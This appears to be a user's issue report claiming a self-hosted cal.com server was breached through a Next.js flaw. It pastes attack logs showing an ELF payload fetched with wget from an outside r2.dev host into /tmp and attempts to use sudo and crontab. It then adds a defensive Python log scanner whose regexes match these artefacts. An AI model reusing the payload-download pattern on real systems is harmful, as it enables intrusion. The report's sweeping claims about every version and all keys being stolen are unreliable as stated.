Description
Self hosted cal.com has been compromised due to the next.js security. Every version of cal.com has been compromised and all your secret keys have been stolen.
Logs clearly show multiple vulnerabilities and bad actors exploiting and stealing the AWS keys.
What's even worse is that in the latest fixed version cal.com has locked all critical key features which makes even upgrades impossible.
If the cal.com team had any honor they would either fix the security vulnerability in the older version OR unlock the key features in the fixed version.
Logs from the hack on my server:
@calcom/web:start:
@calcom/web:start: --2025-12-10 06:48:52-- https://pub-dc84e32afcfa417fa04d36454032549b.r2.dev/corn
@calcom/web:start: Resolving pub-dc84e32afcfa417fa04d36454032549b.r2.dev (pub-dc84e32afcfa417fa04d36454032549b.r2.dev)... 104.18.50.34, 104.18.54.45, 2606:4700:3113::6812:362d, ...
@calcom/web:start: Connecting to pub-dc84e32afcfa417fa04d36454032549b.r2.dev (pub-dc84e32afcfa417fa04d36454032549b.r2.dev)|104.18.50.34|:443... connected.
@calcom/web:start: HTTP request sent, awaiting response... 200 OK
@calcom/web:start: Length: 24448 (24K) [application/x-elf]
@calcom/web:start: Saving to: '/tmp/corn'
@calcom/web:start:
@calcom/web:start: 0K .......... .......... ... 100% 2.19M=0.01s
@calcom/web:start:
@calcom/web:start: 2025-12-10 06:48:53 (2.19 MB/s) - '/tmp/corn' saved [24448/24448]
@calcom/web:start:
@calcom/web:start: sh: 57: sudo: not found
@calcom/web:start: sh: 62: crontab: not found
@calcom/web:start: ⨯ [TypeError: Invalid character in header content ["x-action-redirect"]] {
@calcom/web:start: code: 'ERR_INVALID_CHAR'
@calcom/web:start: }
@calcom/web:start: ⨯ [Error: x] { digest: 'cm9vdAo=' }
@calcom/web:start: 07:41:10:193 [WARN] orgDomains.ts Org support not enabled for hostname without "." {
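The log excerpt above contains several artefacts a defender can match on: a wget transfer of an `application/x-elf` payload saved under `/tmp`, a shell spawned from the Node process trying `sudo` and `crontab` (both absent in the container, hence "not found"), the `ERR_INVALID_CHAR` error on the `x-action-redirect` header, and an error `digest` that is plain base64. The following is an added example, not code from the issue or from the cal.com project: a small Python scanner that strips the `@calcom/web:start:` prefix (the only log format assumed here), applies one regex rule per artefact, and base64-decodes any `digest` value that turns out to be printable text. Seven of the sample lines are copied from the posted log; the last benign `[WARN]` line is included for contrast.

```python
import base64
import re

# Sample input: seven lines copied from the log posted in the issue, plus the
# benign orgDomains.ts warning from the same log as a non-matching control line.
SAMPLE_LOG = """\
@calcom/web:start: --2025-12-10 06:48:52-- https://pub-dc84e32afcfa417fa04d36454032549b.r2.dev/corn
@calcom/web:start: Length: 24448 (24K) [application/x-elf]
@calcom/web:start: Saving to: '/tmp/corn'
@calcom/web:start: sh: 57: sudo: not found
@calcom/web:start: sh: 62: crontab: not found
@calcom/web:start: ⨯ [TypeError: Invalid character in header content ["x-action-redirect"]] {
@calcom/web:start: ⨯ [Error: x] { digest: 'cm9vdAo=' }
@calcom/web:start: 07:41:10:193 [WARN] orgDomains.ts Org support not enabled for hostname without "." {
"""

# Assumed log layout: every line from the web workspace carries this turbo-style prefix.
PREFIX = re.compile(r"^@calcom/web:start:\s*")

# One rule per artefact visible in the posted log: (name, severity, pattern).
# A capturing group, where present, becomes the finding's detail.
RULES = [
    ("wget_download", "medium",
     re.compile(r"^--\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(\S+)")),
    ("elf_content_type", "high",
     re.compile(r"\[application/x-elf\]")),
    ("save_to_tmp", "high",
     re.compile(r"Saving to: '(/tmp/[^']+)'")),
    ("shell_persistence_attempt", "high",
     re.compile(r"^sh: \d+: (sudo|crontab): not found")),
    ("invalid_action_redirect_header", "medium",
     re.compile(r'Invalid character in header content \["x-action-redirect"\]')),
]

# Next.js prints an opaque digest with server errors; in the posted log it is
# valid base64 ('cm9vdAo=' decodes to "root\n"), which is worth surfacing.
DIGEST = re.compile(r"digest: '([A-Za-z0-9+/=]+)'")


def decode_digest(token):
    """Return the decoded digest if it is base64 of printable ASCII text, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    text = text.rstrip("\n")
    return text if text and text.isprintable() else None


def scan(log_text):
    """Run every rule over each line and return a list of finding dicts."""
    findings = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        line = PREFIX.sub("", raw).strip()
        for name, severity, pattern in RULES:
            m = pattern.search(line)
            if m:
                detail = m.group(1) if m.groups() else line
                findings.append({"rule": name, "severity": severity,
                                 "line": lineno, "detail": detail})
        m = DIGEST.search(line)
        if m:
            decoded = decode_digest(m.group(1))
            if decoded is not None:
                findings.append({"rule": "printable_error_digest", "severity": "low",
                                 "line": lineno, "detail": decoded})
    return findings


def verdict(findings):
    """Highest severity present, or 'none' when nothing matched."""
    order = {"none": 0, "low": 1, "medium": 2, "high": 3}
    worst = "none"
    for f in findings:
        if order[f["severity"]] > order[worst]:
            worst = f["severity"]
    return worst


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']:>2} [{f['severity']:<6}] {f['rule']}: {f['detail']}")
    print("verdict:", verdict(scan(SAMPLE_LOG)))
```

The rules are deliberately narrow: they match the exact shapes in the posted log (wget's transcript format, dash's `sh: N: cmd: not found` message, the Node header error) so that a normal startup log, such as the `[WARN] orgDomains.ts` line, produces no finding. Running the same scanner over older container logs is a cheap way to check whether the download-to-`/tmp` pattern appeared before the day the issue reports.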